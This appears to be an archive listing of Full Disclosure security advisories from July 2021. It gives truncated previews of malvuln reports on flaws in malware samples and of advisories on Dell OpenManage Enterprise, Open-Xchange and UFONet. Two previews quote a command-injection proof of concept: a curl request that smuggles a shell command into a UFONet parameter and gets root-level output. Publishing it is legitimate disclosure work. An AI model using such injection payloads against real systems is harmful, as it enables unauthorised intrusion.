[FD] Backdoor.Win32.IRCBot.gen / Unauthenticated Remote Command Execution

2021-07-20 Thread malvuln
Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/96f5cdfa5b3416c819d76060f11dc88d.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.IRCBot.gen Vulnerability: Unauthenticated Remote Command Execution Description: The

[FD] Trojan-Spy.Win32.SpyEyes.hqd / Insecure Permissions

2021-07-20 Thread malvuln
Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/6f484fea8f6bb3974185fc856f37541b.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Trojan-Spy.Win32.SpyEyes.hqd Vulnerability: Insecure Permissions Description: The malware creates a

[FD] Trojan-Spy.Win32.SpyEyes.abdb / Insecure Permissions

2021-07-20 Thread malvuln
Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/9185538b01ad700603f38fb0eb8b6e3b.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Trojan-Spy.Win32.SpyEyes.abdb Vulnerability: Insecure Permissions Description: The malware creates

[FD] Backdoor.Win32.Agent.bjev / Insecure Permissions

2021-07-20 Thread malvuln
Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/ca40998b5d62ee7f936537ff3de7993d.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.bjev Vulnerability: Insecure Permissions Description: The malware creates a di

[FD] Backdoor.Win32.IRCBot.gen / Weak Hardcoded Password

2021-07-20 Thread malvuln
Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/9b12ff6b8b025e7fb0a171abad41c79c.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.IRCBot.gen Vulnerability: Weak Hardcoded Password Description: The malware listens o

[FD] HEUR.Backdoor.Win32.Generic / Unauthenticated Open Proxy

2021-07-20 Thread malvuln
Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/f2b5429feaa7d229418cf499ce5f5822.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: HEUR.Backdoor.Win32.Generic Vulnerability: Unauthenticated Open Proxy Description: The malware list

[FD] HEUR.Backdoor.Win32.Generic / Unauthenticated Open Proxy

2021-07-20 Thread malvuln
Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/bcf45d515f2a0c6ead1e44ea6371276b.txt Contact: malvul...@gmail.com Media: twitter.com/malvuln Threat: HEUR.Backdoor.Win32.Generic Vulnerability: Unauthenticated Open Proxy Description: The malware list

Re: [FD] New Release: UFONet v1.7 - "KRäK!eN"...

2021-07-20 Thread psy
On 16/7/21 13:06, Pierre Kim wrote: > Hi, Hi UFOmmander! > Attention to all motherships, borgs have been detected inside a > blackhole. Brace yourself for the impact: > > $ curl > "http://localhost:/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'" > $ cat /tmp/plop > uid=0(r

[FD] Multiple vulnerabilities in Dell OpenManage Enterprise

2021-07-20 Thread Pierre Kim
Hello, Please find a text-only version below sent to security mailing lists. The complete version on "Multiple vulnerabilities in Dell OpenManage Enterprise" is posted here: https://pierrekim.github.io/blog/2021-07-19-dell-openmanage-enterprise-0day-vulnerabilities.html === text-version of t

Re: [FD] New Release: UFONet v1.7 - "KRäK!eN"...

2021-07-20 Thread Pierre Kim
Hi, Attention to all motherships, borgs have been detected inside a blackhole. Brace yourself for the impact: $ curl "http://localhost:/cmd_download_botnet_ip?blackhole=';id>/tmp/plop;'" $ cat /tmp/plop uid=0(root) gid=0(root) groups=0(root) Energy shield levels critical! Enemie

[FD] Open-Xchange Security Advisory 2021-07-19

2021-07-20 Thread Martin Heiland via Fulldisclosure
Dear subscribers, we're sharing our latest advisory with you and like to thank everyone who contributed in finding and solving those vulnerabilities. Feel free to join our bug bounty programs for OX AppSuite, Dovecot and PowerDNS at HackerOne. Yours sincerely, Martin Heiland, Open-Xchange Gmb